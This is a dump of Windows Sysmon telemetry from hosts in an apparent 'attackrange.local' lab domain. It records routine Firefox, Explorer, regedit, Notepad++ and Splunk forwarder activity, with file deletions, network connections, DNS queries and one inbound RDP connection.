Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001053543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.717{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001053542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.717{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf74f831.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76BBFF0C527BEAFDB8D53B66CF8FF4D2,SHA256=C55B0AADEC8F98B44D68F47FFF932813E4CCF3DA320A21BE6E03CA49121C2F01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:00.533{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E2256FD6CB034776A71AED3794DCA3A,SHA256=434F9726CFA2E99655A7604D7FCE83BF0325DC5E7AE8CC3A2B5E20499D20608F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:00.033{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE337B53E89D473AA36828EEBAB82E1B,SHA256=14A5E6E7C9BC659B620675FB3DFE9701CAE90876213A089DC9AE1EBA3396B246,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:00.033{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D8761821C944218C34A864EACE2D55A4,SHA256=0759E34E22F08CD83D703DBE3D070878CEA7FF861B8B53B88EE492F769560407,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:01.700{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE8C585BAA061E28CF15AA1390C74678,SHA256=3C348A73536380282EB35B5D66ACAC3A35464A4E8FCC2A0B880C2F0C7CEEA649,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:01.550{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0715611458BD28CD576034A5C2B40D06,SHA256=BBE92A552479FD481821D543892A6F60CB06E1D413B4337EFCBB9A141A1F3093,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:01.669{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:01.669{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla 
Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:02.701{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=358ABE9DF779E1EAD87C6578BE6558CA,SHA256=9128D76FD4A1A2C8C6123C1194E3541F0B6487537FEB7254F14D5985364A56D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:02.582{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F840C96C2F9DC09595D28CB4328A5FE,SHA256=C14E12F48E346FA62BE72851BFC8CE89B9009A6F82EE1CC6B0C4F604F8835BA0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.599{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61929-false10.0.1.12-8000- 23542300x80000000000000001053554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:03.716{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64BE795CAC3EA7E3D1BA3001BBC006F4,SHA256=2E28BBE1FD6AF9BEDF506D7FAB70C79CEA48A3DA81CDEC878F3DF055143112BE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:02.215{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57428-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:03.613{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA2312DF8A34B5F5ED5820322C343057,SHA256=76641C619B9BE79E6B404FC721F3EB92C37C8021CF05AB37C58FBC87E2594388,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:03.415{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001053552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:03.415{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F6B5-60EB-A97D-00000000CF01}1616C:\Windows\regedit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:04.733{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D962B5F48C4F943E98D174E9F5C81139,SHA256=7DDE7AC82DB9B6B64B9B167F1ECCD510D16E581C457FD972E5A966A7D7E9F2E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:04.644{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8546E9DD3B010A8935B86496A7FEBD2F,SHA256=4979C1498C3A520698CAD599B718B8ACE9A9B754EE97F4548A22A6E0F39E4DE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:05.768{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62557A27391DA47D6688EB99EB47A99F,SHA256=F39BC03F34E01E551E62C90F4E4B4B39E396286F76DBDD6DF58687EBD24CDAB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:05.675{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66E7FD3449F7DACD3A364C123F432C4D,SHA256=B40D049F76C3C0CCD393C58E7E57E9BFEF363F8667A81B1A2BA109FC6F695A00,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:57.834{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-44383-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001053557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:05.615{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5F17C06D07CD5521ACCE31B80716B838,SHA256=FA52F1B9172ACD20F360A08E7E549B3D88640A4D68BF80821ABE88500EF2B693,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:05.615{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=12B31FEDC1296B93BA06DC20CB13F0FC,SHA256=3362899E715BEE37B199A03AC476187AA5EEBF210593AC976727811CFFFC166F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:06.782{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE93B4ED174FD9812B2B2753A3E3E986,SHA256=F7A2093581869DC9EEE617E2EF85E93F0B3C43EF4353A6A0E3B49D0BD1FA83F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:06.691{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FBD6FE1E2A9955086109FBF24793D69,SHA256=2530B04420B4D9AAFC1A2E70E4D4134AE777829AE0740BBA24BD29E9492A3F38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:06.451{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:06.398{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla 
Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001053562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:06.398{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-57B0-60E8-6810-00000000CF01}7548C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla 
Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001053561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 08:05:06.398{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.7548.375.114763493C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001053560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:05:06.398{466BC892-57B0-60E8-6810-00000000CF01}7548\chrome.7548.375.114763493C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001053568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:07.797{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB5C3EBA640E3303F3AD88ED424B07AE,SHA256=4EF0CFEF7FDC27F9D1C8E760851A733EF8D13A75ACFA3B900B963E333960BCA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:07.691{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3C6E20A8A7FD1B200A8CD3F1CE481B4,SHA256=AC9E3CC60773C3E2CEAB2620BD501E6F0DF6B25E45A3E11E5322D1BFEF732B5C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:59.931{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58941- 354300x80000000000000001053566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:59.613{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61930-false10.0.1.12-8000- 23542300x80000000000000001053569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:08.812{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=065636DAE89FD69E64B33B2AC4252F46,SHA256=779E04C6E69F24BBCF2818345B6AA915F8E21A627DC813BCB81C2AC82AB6CDED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:08.707{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F46C2E5BC6F2C14DF3D7903B98D8F6F6,SHA256=5CE091898CABD9FB582B432BC07E72EE6F2288B7B84F0BCE22D362DADFE1BFC3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001053572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:09.831{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E67E5DBA0D8C8B3A77A8AFAA9CDFAF8,SHA256=F6E9DF388FEC846672CA811088D25CD6B68D71D9B674772E9C6E72CF61D20506,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:09.707{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFC3BFC1D593269134E8954D7525F165,SHA256=6EC1949B77A399413C59D394671A66F0C612EC1F28EC0EA8A02E6D528F81D04A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:09.734{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:09.734{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000809880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:07.386{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57429-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 